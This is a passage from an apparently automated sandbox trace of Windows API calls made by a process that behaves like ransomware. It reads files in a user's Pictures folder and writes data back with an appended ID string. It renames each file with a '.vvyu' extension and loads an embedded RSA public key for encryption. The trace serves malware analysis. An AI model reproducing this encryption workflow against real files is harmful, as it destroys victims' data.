Size=0x40) returned 0x2d41d10 [0192.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39da8 [0192.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41d58 [0192.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dc0 [0192.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39df0 [0192.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e50 [0192.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e08 [0192.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0192.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0192.945] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0192.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0192.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39df0 | out: hHeap=0x6a0000) returned 1 [0192.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e08 | out: hHeap=0x6a0000) returned 1 [0192.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e50 | out: hHeap=0x6a0000) returned 1 [0192.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0192.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e50 [0192.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0192.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e08 [0192.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0192.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39df0 [0192.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0192.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0192.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0192.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0192.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0192.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0192.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0192.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e08 | out: hHeap=0x6a0000) returned 1 [0192.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39df0 | out: hHeap=0x6a0000) returned 1 [0192.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e50 | out: hHeap=0x6a0000) returned 1 [0192.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0192.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0192.949] GetCurrentThreadId () returned 0x264 [0192.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0192.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d455f0 [0192.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0192.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaa30 [0192.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0192.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0192.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.950] GetCurrentThreadId () returned 0x264 [0192.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0192.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0192.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0192.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0192.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0192.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e50 [0192.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0192.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0192.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0192.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39df0 [0192.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0192.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0192.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0192.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0192.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e08 [0192.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0192.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0192.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0192.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dd8 [0192.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0192.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e68 [0192.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0192.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e38 [0192.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e20 [0192.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e80 [0192.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e20 | out: hHeap=0x6a0000) returned 1 [0192.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e20 [0192.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e38 | out: hHeap=0x6a0000) returned 1 [0192.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0192.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0192.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0192.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39df0 | out: hHeap=0x6a0000) returned 1 [0192.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39df0 [0192.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0192.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e50 | out: hHeap=0x6a0000) returned 1 [0192.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0192.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e80 | out: hHeap=0x6a0000) returned 1 [0192.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0192.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0192.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0192.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39df0 | out: hHeap=0x6a0000) returned 1 [0192.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0192.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0192.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0192.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaa30 | out: hHeap=0x6a0000) returned 1 [0192.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0192.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0192.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0192.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0192.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0192.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0192.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e20 | out: hHeap=0x6a0000) returned 1 [0192.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e68 | out: hHeap=0x6a0000) returned 1 [0192.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e08 | out: hHeap=0x6a0000) returned 1 [0192.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dd8 | out: hHeap=0x6a0000) returned 1 [0192.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0192.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dc0 | out: hHeap=0x6a0000) returned 1 [0192.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d58 | out: hHeap=0x6a0000) returned 1 [0192.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0192.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0192.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0192.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0192.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0192.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0192.961] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x1668f, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x1668f, lpOverlapped=0x0) returned 1 [0192.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.963] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x16694, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.963] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0192.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0192.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0192.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0192.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0192.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0192.964] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0192.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.965] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.965] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0192.965] CloseHandle (hObject=0x584) returned 1 [0192.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x711c18 [0192.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d45778 [0192.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x711c18 | out: hHeap=0x6a0000) returned 1 [0192.967] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\iJwMptujDhUTwyI.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\7q5_45ijmfp9ba\\ijwmptujdhutwyi.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\iJwMptujDhUTwyI.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\7q5_45ijmfp9ba\\ijwmptujdhutwyi.gif.vvyu")) returned 1 [0192.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.969] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0192.972] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a33e810, ftCreationTime.dwHighDateTime=0x1d8a5e1, ftLastAccessTime.dwLowDateTime=0x6b9d3280, ftLastAccessTime.dwHighDateTime=0x1d8a623, ftLastWriteTime.dwLowDateTime=0x6b9d3280, ftLastWriteTime.dwHighDateTime=0x1d8a623, nFileSizeHigh=0x0, nFileSizeLow=0x3d2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LEjZveDJk.gif", cAlternateFileName="LEJZVE~1.GIF")) returned 1 [0192.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0192.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0192.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0192.972] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\LEjZveDJk.gif") returned=".gif" [0192.973] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\LEjZveDJk.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\7q5_45ijmfp9ba\\lejzvedjk.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.975] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=15658) returned 1 [0192.975] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0192.978] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x3d04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.978] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0192.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.981] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.981] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x3d2a, lpOverlapped=0x0) returned 1 [0192.982] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0192.982] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.982] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.982] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eaa30) returned 1 [0192.983] CryptCreateHash (in: 